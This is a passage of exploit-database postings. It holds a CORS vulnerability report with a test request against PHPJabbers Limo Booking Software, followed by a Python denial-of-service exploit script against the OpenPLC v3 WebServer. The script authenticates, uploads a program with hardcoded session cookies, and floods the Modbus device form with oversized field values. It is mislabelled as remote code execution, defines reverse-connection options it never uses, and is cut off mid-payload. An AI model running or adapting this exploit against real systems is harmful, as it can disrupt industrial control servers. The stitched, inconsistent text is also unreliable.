[href](https://www.nu11secur1ty.com/2023/09/shuttle-booking-software-10-multiple.html)
## Time spent:
01:47:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
## Title: Limo Booking Software v1.0 - CORS
## Author: nu11secur1ty
## Date: 09/08/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/limo-booking-software/#sectionDemo
## Reference: https://portswigger.net/web-security/cors
## Description:
The application implements an HTML5 cross-origin resource sharing
(CORS) policy for this request that allows access from any domain.
The application allowed access from the requested origin http://wioydcbiourl.com
Since the Vary: Origin header was not present in the response, reverse
proxies and intermediate servers may cache it. This may enable an
attacker to carry out cache poisoning attacks. The attacker can get
some of the software resources of the victim without the victim
knowing this.
STATUS: HIGH Vulnerability
[+]Test Payload:
```
GET /1694201352_198/index.php?controller=pjFrontPublic&action=pjActionFleets&locale=1&index=2795
HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141
Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://wioydcbiourl.com
Referer: http://demo.phpjabbers.com/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Limo-Booking-Software-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/limo-booking-software-10-cors.html)
## Time spent:
00:35:00
# Exploit Title: OpenPLC WebServer 3 - Denial of Service
# Date: 10.09.2023
# Exploit Author: Kai Feng
# Vendor Homepage: https://autonomylogic.com/
# Software Link: https://github.com/thiagoralves/OpenPLC_v3.git
# Version: Version 3 and 2
# Tested on: Ubuntu 20.04
import requests
import sys
import time
import optparse
import re
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)")
parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")
parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login")
parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection")
parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection")
options, args = parser.parse_args()
if not options.url:
print('[+] Remote Code Execution on OpenPLC_v3 WebServer')
print('[+] Specify an url target')
print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444")
exit()
host = options.url
login = options.url + '/login'
upload_program = options.url + '/programs'
compile_program = options.url + '/compile-program?file=681871.st'
run_plc_server = options.url + '/start_plc'
user = options.user
password = options.passw
rev_ip = options.rip
rev_port = options.rport
x = requests.Session()
def auth():
print('[+] Remote Code Execution on OpenPLC_v3 WebServer')
time.sleep(1)
print('[+] Checking if host '+host+' is Up...')
host_up = x.get(host)
try:
if host_up.status_code == 200:
print('[+] Host Up! ...')
except:
print('[+] This host seems to be down :( ')
sys.exit(0)
print('[+] Trying to authenticate with credentials '+user+':'+password+'')
time.sleep(1)
submit = {
'username': user,
'password': password
}
x.post(login, data=submit)
response = x.get(upload_program)
if len(response.text) > 30000 and response.status_code == 200:
print('[+] Login success!')
time.sleep(1)
else:
print('[x] Login failed :(')
sys.exit(0)
def injection():
print('[+] PLC program uploading... ')
upload_url = host + "/upload-program"
upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"}
upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"}
upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n VAR\n var_in : BOOL;\n var_out : BOOL;\n END_VAR\n\n var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n RESOURCE Res0 ON PLC\n TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n PROGRAM Inst0 WITH Main : prog0;\n END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n"
upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data)
act_url = host + "/upload-program-action"
act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"}
act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n"
upload_act = x.post(act_url, headers=act_headers, data=act_data)
time.sleep(2)
def connection():
print('[+] add device...')
inject_url = host + "/add-modbus-device"
# inject_dash = host + "/dashboard"
inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"}
inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0", "Accept": "/text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------169043028319378579443281515639", "Origin": host, "Connection": "close", "Referer": host + "/add-modbus-device", "Upgrade-Insecure-Requests": "1"}
inject_data = "-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_name\"\r\n\r\n122222222222222222222222222222222222211111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_protocol\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_id\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_ip\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_port\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_baud\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_parity\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_data\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_stop\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_pause\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"di_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"di_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"do_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"do_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"ai_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"ai_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aor_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aor_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aow_start\"\r\n\r\n#11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111